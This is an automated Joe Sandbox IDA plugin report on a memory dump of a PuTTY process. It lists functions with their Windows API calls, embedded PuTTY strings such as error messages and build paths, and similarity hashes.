Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: LocalTime
String ID: %H%M%S$&$&$&
API String ID: 481472006-1342691861
Opcode ID: 7754911c07975408a56c28bdb70c490daeb0354991e64362784eaa003372bf84
Instruction ID: 2d150cad269ac6a9d41b7a891fe42edd29effc3151ae78c6854230f6e08994f6
Opcode Fuzzy Hash: 7754911c07975408a56c28bdb70c490daeb0354991e64362784eaa003372bf84
Instruction Fuzzy Hash: BE51F7B2905744ABD720AB209C46F2BB7E4EB55704F4844ADFC859B242F331F9989793

Function 00BA5BE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 132windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32(00000040,00000000), ref: 00BA5CF8
DeleteMenu.USER32(00000040,00000000), ref: 00BA5D04
MessageBoxA.USER32(00000000,00000000,00000000,00000010), ref: 00BA5D7D

Strings

Unable to open terminal:%s, xrefs: 00BA5D5F
Unable to open connection to%s%s, xrefs: 00BA5D4F
%s Error, xrefs: 00BA5D27

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: DeleteMenu$Message
String ID: %s Error$Unable to open connection to%s%s$Unable to open terminal:%s
API String ID: 1035315089-2786405544
Opcode ID: 41b594669f223f7bcaf6c63093d05b7d57235cc1f0efbadcc214c5ae43d738ca
Instruction ID: 60b8c3428d0ab6e657f9d56cf49e2376d7c9576e7a347666fe1f8588676f0f6d
Opcode Fuzzy Hash: 41b594669f223f7bcaf6c63093d05b7d57235cc1f0efbadcc214c5ae43d738ca
Instruction Fuzzy Hash: E84106F5940140BBD6213B24BC1BF2E7BA5EB1770DF040075FA45AA2B2F5625A24A7A2

Function 00C40B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00C40BC7
___except_validate_context_record.LIBVCRUNTIME ref: 00C40BCF
_ValidateLocalCookies.LIBCMT ref: 00C40C58
__IsNonwritableInCurrentImage.LIBCMT ref: 00C40C83
_ValidateLocalCookies.LIBCMT ref: 00C40CD8

Strings

csm, xrefs: 00C40C6D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 604bb1564a922f028300293bc2843d8af4db353b1cf20020fa9cdd52288e62b4
Instruction ID: d203448491796957374de37114522bc25c78cd0c85dfa109986dbc99da7b2a78
Opcode Fuzzy Hash: 604bb1564a922f028300293bc2843d8af4db353b1cf20020fa9cdd52288e62b4
Instruction Fuzzy Hash: 0341C334A40218DBCF14DF68C8C4B9E7BB5FF45328F248255EE18AB392C731AA45CB91

Function 00BDCEA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00BDCD70: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52EC), ref: 00BDCDED
Part of subcall function 00BDCD70: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52F0), ref: 00BDCE1C
Part of subcall function 00BDCD70: GetLastError.KERNEL32(?,00000001,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00CA52F0), ref: 00BDCE26

GetCurrentProcess.KERNEL32 ref: 00BDCF82
GetLastError.KERNEL32 ref: 00BDCFBC
LocalFree.KERNEL32(?), ref: 00BDCFE3

Strings

unable to construct ACL: %s, xrefs: 00BDCF65
Could not restrict process ACL: %s, xrefs: 00BDCFEA
Unable to set process ACL: %s, xrefs: 00BDCFB7, 00BDCFCC

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: AllocateErrorInitializeLast$CurrentFreeLocalProcess
String ID: Could not restrict process ACL: %s$Unable to set process ACL: %s$unable to construct ACL: %s
API String ID: 4156538165-2118130043
Opcode ID: dcfe7e02f2184e8bc280c9f97fa091661d99d782052c7bd1bdf124790e1f44b1
Instruction ID: 84eeec558f2f701d80de9b93899d9d984a4b21d17aa44ca1544809ffa99ce68a
Opcode Fuzzy Hash: dcfe7e02f2184e8bc280c9f97fa091661d99d782052c7bd1bdf124790e1f44b1
Instruction Fuzzy Hash: 8F3149B1608301AFE3109F14D849B5FBFF8EB85748F04495EF9889B391E3B59908CB92

Function 00C30AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(?,40000003,00000008,000000FF,00001000,00001000,00000000), ref: 00C30B23
ConnectNamedPipe.KERNEL32(?,00000010), ref: 00C30B3A
GetLastError.KERNEL32 ref: 00C30B44
CloseHandle.KERNEL32(?), ref: 00C30B86

Strings

Error while listening to named pipe: %s, xrefs: 00C30BA3

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: NamedPipe$CloseConnectCreateErrorHandleLast
String ID: Error while listening to named pipe: %s
API String ID: 3669627233-1472817922
Opcode ID: 412a5a050aadac2c7b9f580d6d0f1bdbf555a350a7170b3e33c4ceaf256ad038
Instruction ID: 20d1ab73a87ffb6e786ec7a86bda1908904a6049e108bb4a7b90123c1952ffa7
Opcode Fuzzy Hash: 412a5a050aadac2c7b9f580d6d0f1bdbf555a350a7170b3e33c4ceaf256ad038
Instruction Fuzzy Hash: C131C471640704AFE3206F29EC59F2BB7A8EF48718F20496DF896C7291E671A841DA52

Function 00BA2030 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00BA2670
GetCursorPos.USER32(?), ref: 00BA2682
IsZoomed.USER32 ref: 00BA26F5
GetWindowLongA.USER32(000000F0), ref: 00BA2707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BA273D

Strings

(, xrefs: 00BA26AA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: 1638a2214ca88873a05968be9ab050f801bae181e13fd29273ce6f42106f70d6
Instruction ID: f58e7d8583169e4671f74bbdda5ee1902e07c89444e67b615ff927e231ba1982
Opcode Fuzzy Hash: 1638a2214ca88873a05968be9ab050f801bae181e13fd29273ce6f42106f70d6
Instruction Fuzzy Hash: CB217C3160D2009FE7259F28DCA9BAE77E5FB42744F44882DF581C61A1DB74C944EB52

Function 00BA1FFE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00BA2670
GetCursorPos.USER32(?), ref: 00BA2682
IsZoomed.USER32 ref: 00BA26F5
GetWindowLongA.USER32(000000F0), ref: 00BA2707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BA273D

Strings

(, xrefs: 00BA26AA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: 4c72e800e131c43c5a458dd82a8587941604aed36cb6e745196f2fa847e3762a
Instruction ID: 59c712c5dfde664b2db78a6496f630072d364b1e4f62b0a9853d0faa59ecd85d
Opcode Fuzzy Hash: 4c72e800e131c43c5a458dd82a8587941604aed36cb6e745196f2fa847e3762a
Instruction Fuzzy Hash: 6D21AD3160D2009FE7259F28DCA9BAE77E0FB42344F44882DF981C61A0DB75D944EB52

Function 00BA2016 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00BA2670
GetCursorPos.USER32(?), ref: 00BA2682
IsZoomed.USER32 ref: 00BA26F5
GetWindowLongA.USER32(000000F0), ref: 00BA2707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BA273D

Strings

(, xrefs: 00BA26AA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: 9fddfdf99a4e381d7471f936c79a9ab7f105077f77c18b4277c92fab0cfdcfd5
Instruction ID: 2a78670b0ee9dbaa31e57cc41ea447a235c4f2ab7b06c83299dc007bc61d798b
Opcode Fuzzy Hash: 9fddfdf99a4e381d7471f936c79a9ab7f105077f77c18b4277c92fab0cfdcfd5
Instruction Fuzzy Hash: 5021AD3164D2009FE7259B2CDC69BAE77E0FB42344F44882DF581C61A0DBB5C944EB52

Function 00BA1ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00BA2670
GetCursorPos.USER32(?), ref: 00BA2682
IsZoomed.USER32 ref: 00BA26F5
GetWindowLongA.USER32(000000F0), ref: 00BA2707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 00BA273D

Strings

(, xrefs: 00BA26AA

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: fc0a574ddbb16d2ca1ea7517159d80da959418d894fc1dad0998a64aaed7ed6b
Instruction ID: f59dbe2499a18142bee2c8773f58e12a3a910386f76016ccdac4c0994f192afa
Opcode Fuzzy Hash: fc0a574ddbb16d2ca1ea7517159d80da959418d894fc1dad0998a64aaed7ed6b
Instruction Fuzzy Hash: CF21AD3160D2009FE7259F28DCA9B6E77E0FB42344F44882DF581C61A0DBB4CD44EB52

Function 00BEB0A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 00BEB0B2
_strcspn.LIBCMT ref: 00BEB0CA

Part of subcall function 00BDEF00: _strlen.LIBCMT ref: 00BDEF0B

_strlen.LIBCMT ref: 00BEB12D

Strings

!cs->sent_verstring, xrefs: 00BEB175
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/ssh/sharing.c, xrefs: 00BEB170
SSHCONNECTION@putty.projects.tartarus.org-2.0-, xrefs: 00BEB11D

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: _strcspn_strlen
String ID: !cs->sent_verstring$/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/ssh/sharing.c$SSHCONNECTION@putty.projects.tartarus.org-2.0-
API String ID: 2927111553-2985379557
Opcode ID: b74297619ec4ba99c21719488d592f811d8b1bc5343635cb88306d94e995097b
Instruction ID: 826003234bdf4cc4259dddad907f16f72ca336778884459b9558975abfa8226d
Opcode Fuzzy Hash: b74297619ec4ba99c21719488d592f811d8b1bc5343635cb88306d94e995097b
Instruction Fuzzy Hash: 17213BB29107406BDB216A20EC4AF677AD49F42724F0906B8FC05663C3F762E959C7E2

Function 00C54BE9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00C54CF6,?,?,?,00000000,?,?,00C546FA,00000021,FlsSetValue,00C7C758,00C7C760,?), ref: 00C54CAA

Strings

ext-ms-, xrefs: 00C54C54
api-ms-, xrefs: 00C54C40

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 406bedb0a4fb6aa37b3d7228cc4bc1c76df7ac3e102b8558952a22394a56140b
Instruction ID: 26ed2131143c664a74d25610b4b0f9627e72c042068eed5e3690e1a1be7f5b77
Opcode Fuzzy Hash: 406bedb0a4fb6aa37b3d7228cc4bc1c76df7ac3e102b8558952a22394a56140b
Instruction Fuzzy Hash: 5E213D3AA03211F7CB258B21EC48B5E37589B81769F140124FD16A7290D770FFC5C6E8

Function 00C30600 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(?,00000000,?), ref: 00C3066F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 00C3067E
GetLastError.KERNEL32(?,00000000,?), ref: 00C30686

Part of subcall function 00BDD3E0: FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,0000FFFF,00000000,?,?,?,?,00BD711E,?), ref: 00BDD46B
Part of subcall function 00BDD3E0: _strlen.LIBCMT ref: 00BDD476

LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00C0963B,00000000,?), ref: 00C306B1
LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00C0963B,00000000,?), ref: 00C306C0

Part of subcall function 00BDCBD0: LocalAlloc.KERNEL32(00000040,00000014,?,00000000,?), ref: 00BDCC9D
Part of subcall function 00BDCBD0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?), ref: 00BDCCAD
Part of subcall function 00BDCBD0: SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?), ref: 00BDCCC2
Part of subcall function 00BDCBD0: SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?), ref: 00BDCCD5

Strings

CreateMutex("%s") failed: %s, xrefs: 00C30697

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait_strlen
String ID: CreateMutex("%s") failed: %s
API String ID: 3757897666-2623464464
Opcode ID: d1ac1da82d4c79dfc2de64d24a20b8763ce0242695475b883f901252ade157b3
Instruction ID: c7d08ae774db99cd50f99d8623c7f0034596aaba2bbb08988c71de66866278a8
Opcode Fuzzy Hash: d1ac1da82d4c79dfc2de64d24a20b8763ce0242695475b883f901252ade157b3
Instruction Fuzzy Hash: 0D219DB2604305AFD610EF249C4AB2FB7E8AB84754F14492DFC94D7281EB30D9058BA2

Function 00BA6870 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71windowCOMMON

Download Yara Rule

APIs

DeleteMenu.USER32(00000040,00000000), ref: 00BA6925
InsertMenuA.USER32(00000030,00000000,00000040,&Restart Session), ref: 00BA693E
DeleteMenu.USER32(00000040,00000000), ref: 00BA694A
InsertMenuA.USER32(00000030,00000000,00000040,&Restart Session), ref: 00BA695D

Strings

&Restart Session, xrefs: 00BA692D, 00BA694C
%s (inactive), xrefs: 00BA687F

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Menu$DeleteInsert
String ID: %s (inactive)$&Restart Session
API String ID: 985044671-219138112
Opcode ID: 2315dcd1ee79e30897dd55e3c14eac6e11d3e1f0b449ba9549e2e3fec985445c
Instruction ID: 5300764a691d6a3f5e9dc01b64fc8628f5887560ac536eb5dbebd7c0ab4f3997
Opcode Fuzzy Hash: 2315dcd1ee79e30897dd55e3c14eac6e11d3e1f0b449ba9549e2e3fec985445c
Instruction Fuzzy Hash: 222181F1640291BBE6206B65FD1BF497B95EB03708F140074F604EB2E1D6B1E654CB59

Function 00C07A60 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00C07AAE
EnterCriticalSection.KERNEL32(00CA53E0), ref: 00C07ABC
LeaveCriticalSection.KERNEL32(00CA53E0), ref: 00C07ADE
SetEvent.KERNEL32(?), ref: 00C07AF8

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c, xrefs: 00C07A75
h && !h->u.g.moribund, xrefs: 00C07A7A

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: CriticalSection$CloseEnterEventHandleLeave
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c$h && !h->u.g.moribund
API String ID: 1836394787-2696147314
Opcode ID: 310d7fe62eb76f49c9b9af19fad2f092b61c523679b38e0aafb91fa8ed537099
Instruction ID: 6ea83d9c55694359c92a227aa54118e81c81bff553b78c6e3b35f6b74812ef24
Opcode Fuzzy Hash: 310d7fe62eb76f49c9b9af19fad2f092b61c523679b38e0aafb91fa8ed537099
Instruction Fuzzy Hash: 03118F70A04B419FD7359F65E80CB5ABBF0AF45714F04896EE4D6826A0D3B0B649CB52

Function 00BA66E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F02), ref: 00BA69AA
SetClassLongA.USER32(000000F4,00000000), ref: 00BA69BB
SetCursor.USER32(00000000), ref: 00BA69C2
ShowCursor.USER32(00000000), ref: 00BA69D4

Strings

/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA69E8
false && "Bad busy_status", xrefs: 00BA69ED

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: Cursor$ClassLoadLongShow
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$false && "Bad busy_status"
API String ID: 1160125251-1066913011
Opcode ID: 0a441adc6b8643705107a371e088f0e388880fa7ce3e75724dd10d870e139b34
Instruction ID: bb5eeb98bf09fe08f39d027f38fa1585c9928d7534866dae4140fc85cddc5b60
Opcode Fuzzy Hash: 0a441adc6b8643705107a371e088f0e388880fa7ce3e75724dd10d870e139b34
Instruction Fuzzy Hash: C501DFF058C2826EEB0557649D6EB3E3B84E717359B184169F942C22A0CB248800C621

Function 00BA7180 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetStockObject.GDI32(0000000F), ref: 00BA7196
SelectPalette.GDI32(?,00000000,00000000), ref: 00BA71A0
ReleaseDC.USER32(?), ref: 00BA71AD

Strings

wgs.term_hwnd, xrefs: 00BA71EF
/home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c, xrefs: 00BA71C4, 00BA71EA
wintw_hdc, xrefs: 00BA71C9

Memory Dump Source

Source File: 00000007.00000002.2984563110.0000000000BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000007.00000002.2984524294.0000000000BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984701874.0000000000C69000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984764814.0000000000CA4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2984876233.0000000000CAA000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_ba0000_putty.jbxd

Similarity

API ID: ObjectPaletteReleaseSelectStock
String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/window.c$wgs.term_hwnd$wintw_hdc
API String ID: 3714893027-3486798234
Opcode ID: 493c768be531033d6fd719037d4922654cc97a86d6557b86cc6dbb71ce79cb00
Instruction ID: e76e871e422fab9a24d7a2d7449bfa1f074da742a4f01e77cd989281c35de56c
Opcode Fuzzy Hash: 493c768be531033d6fd719037d4922654cc97a86d6557b86cc6dbb71ce79cb00
